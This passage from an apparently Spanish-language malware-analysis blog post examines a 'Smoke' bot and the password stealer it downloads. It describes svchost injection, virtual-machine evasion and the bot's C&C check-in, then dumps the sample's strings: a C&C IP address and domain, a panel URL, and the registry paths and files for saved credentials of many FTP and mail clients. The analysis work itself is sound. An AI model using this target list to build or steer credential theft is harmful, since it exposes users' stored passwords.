<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50F0 DD Smoke.001E1178 ASCII "cmd=getload&login="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50F4 DD Smoke.001E118C ASCII "http://www.msn.com/"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50F8 DD Smoke.001E11A0 ASCII "GET /%s HTTP/1.1</span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;">Esta amenaza se inyecta en un proceso svchost.exe</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">001E2798 ASCII "svchost.exe",0</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Tiene protección de ejecución en maquina virtuales</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50D8 DD Smoke.001E113C ASCII "qemu"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50DC DD Smoke.001E1144 ASCII "virtual"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50E0 DD Smoke.001E114C ASCII "vmware"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">001E50E4 DD Smoke.001E1154 ASCII "xen"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace;">Reporte al C&C</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;">"cmd=getload&login="</span><br />
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: 'Courier New', Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">En la prueba dinámica, el bot descarga otro modulo ejecutable encargado del robo de información sensible de la victima (Password Stealer)</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEM1jbL-ZTUh2WDh394t1fMa6GdOU3EbBxiWKuLCxtxmceDcbaYmcX4rIY7t3Q08EQQmcKXL5uWqup5CCXujrBLPSzcWzDEKrEaSN0LgYk12KkgJKNYxXFZJ7BbAip9zmZQyN8i6Mi6eU/s1600/03.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgEM1jbL-ZTUh2WDh394t1fMa6GdOU3EbBxiWKuLCxtxmceDcbaYmcX4rIY7t3Q08EQQmcKXL5uWqup5CCXujrBLPSzcWzDEKrEaSN0LgYk12KkgJKNYxXFZJ7BbAip9zmZQyN8i6Mi6eU/s1600/03.png" height="306" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: left;">
Analisis en V.T.</div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqQfL_KBbujKvmapf_8dCkyGfblbsk_K5h6KpmUnwhQa-jO7gZoz2EUmq3YEkkUgnb0FKb3orneNh8GucM5OQQmD9TgJyQCzkrjM6O2eItnrYK27DrhpCFaF3sWtXX1EeLtNs61zenzr4/s1600/vt3.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgqQfL_KBbujKvmapf_8dCkyGfblbsk_K5h6KpmUnwhQa-jO7gZoz2EUmq3YEkkUgnb0FKb3orneNh8GucM5OQQmD9TgJyQCzkrjM6O2eItnrYK27DrhpCFaF3sWtXX1EeLtNs61zenzr4/s1600/vt3.jpg" height="140" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: left;">
<br /></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">No contiene capa de ofuscación.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Strings:</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> Text string</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "===="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "software\microsoft\windows\currentversion"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "VendorId"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "rpcrt4.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "UuidCreate"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "software\microsoft\windows\currentversion"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "VendorId"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "GetProcAddress"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Mozilla 4.0"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Accept: text/html,application/xhtml+xml,applicati</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "gzip"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> (Initial CPU selection)</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Mozilla/4.0 (Mozilla/4.0; MSIE 7.0; Windows NT 5.</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "http://%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\Microsoft\Windows\CurrentVersion\Run"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "regedit32"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "SYSTEM\CurrentControlSet\Services\SharedAccess\Pa</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:*:Enabled:Microsoft Office"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "5629186B-0207-4659-AE5D-B09282932A86"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s_%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s_%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "0123456789ABCDEFabcdef"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "0123456789ABCDEFabcdef"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "0123456789ABCDEFabcdef"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "0123456789ABCDEFabcdef"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\..\Local\VirtualStore"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\*.*"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "text"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "gzip"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "HTTP/1.1"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Content-Encoding: gzip"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Content-Length:"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Transfer-Encoding: chunked"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "bhappyland.com"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Mozilla/5.0 (Windows; U; Windows NT 5.1)"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "index_get.php?key=YRHDXCF&action=ADD_FTP&id=%s&ft</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "SUCCESS"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%08X-%04X-%04X-%02X%02X%02X%02X%02X%02X%02X%02X"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "93.113.37.210"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "===="</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "WABOpen"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\Microsoft\WAB\DLLPath"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Identities"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Identities"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Microsoft\Outlook Express"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "*.dbx"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "SOFTWARE\Clients\Mail"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Microsoft Outlook"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Microsoft Outlook"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "SOFTWARE\Clients\Mail\Microsoft Outlook"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".."</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "MSWQ*.tmp"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "MSWQ*.tmp"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".rar"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".zip"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".cab"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".avi"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".mp3"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".jpg"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".gif"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "10"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "11"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "12"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "13"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "14"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:%s:%s:%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Config Path"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\VanDyke\SecureFX"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\Sessions"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\*.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\*.*"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Username"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Hostname"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Password"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\FTPWare\CoreFTP\Sites"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "PW"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "hdfzpysvpzimorhk"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "DataFolder"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\FTPRush"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "RushSite.xml"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\UltraFXP"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Sites.xml"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "USER"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "HOST"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "PASS"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Estsoft\ALFTP\ESTdb2.dat"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Encrypt_PW"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "ID"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "URL"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\Microsoft\Windows\CurrentVersion\Uninsta</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "FTP Commander"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "FTP Navigator"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "InstallLocation"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "UninstallString"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Ftplist.txt"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Server"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Password"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\CoffeeCup Software\Internet\Profiles"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Password"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "HostName"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Username"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\TurboFTP\addrbk.dat"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:%s:%s:%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:%s:%s:%s:%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\SmartFTP\Client 2.0\Favorites"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\*.xml"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\*.*"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII ".."</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "<host>"</host></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "<host>"</host></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "</span><br />
"<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "<port>"</port></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "<port>"</port></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "</span><br />
"<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "<user>"</user></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "<user>"</user></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "</span><br />
"<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "<password>"</password></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "<password>"</password></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "</span><br />
"<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:%s:%s:%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s:%s:%s:%s:%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "uid"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "pwd"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "software\ipswitch\ws_ftp"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "DataDir"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\sites\ws_ftp.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "wcx_ftp.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "GHISLER"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "wcx_ftp.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\Ghisler"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "FtpIniName"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Install_Dir"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "wcx_ftp.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "InstallDir"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "wcx_ftp.ini"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "connections"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "username"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "password"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "anonymous"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "e-mail"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "general"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "://"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "MS IE FTP Passwords"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "MS IE FTP Passwords"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "DPAPI: "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "acheCredentials"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "WininetCacheCredentials"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "pstorec.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "crypt32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "PStoreCreateInstance"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "CryptUnprotectData"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Pass"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Install_Dir"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\FileZilla"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "FileZilla.xml"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Server "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Site "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Pass"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\FileZilla"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Last Server Pass"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Last Server User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Last Server Host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\FileZilla\Site Manager"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Pass"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Host"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\GlobalSCAPE"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "sm.*"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "8."</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\GlobalSCAPE\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Software\GlobalSCAPE\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "\QCToolbar"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "QCHistory"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%s\%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "HostName"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "User"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Password"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "software\far\plugins\ftp\hosts"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "software\far2\plugins\ftp\hosts"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Win32StopOffMutant"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Win32StopOffMutant"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE ":\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE "=::=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "AUTH PLAIN"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "235"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "USER"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "PASS"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "230"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "USER"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "PASS"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "OK"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "LOGIN "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%d.%d.%d.%d:%s:%s"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "%d:%s:%s:%d.%d.%d.%d"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "MAIL FROM:"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UNICODE ":=::\"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "RCPT TO:"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span>
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "NtQueryInformationProcess"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "ntdll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "AllocateAndGetTcpExTableFromStack"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "iphlpapi.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "AllocateAndGetUdpExTableFromStack"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "iphlpapi.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "CreateToolhelp32Snapshot"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "kernel32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Process32First"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "kernel32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "Process32Next"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ASCII "kernel32.dll"</span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"></span><br />
<br />
Consola del C&C<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<div class="separator" style="clear: both; text-align: center;">
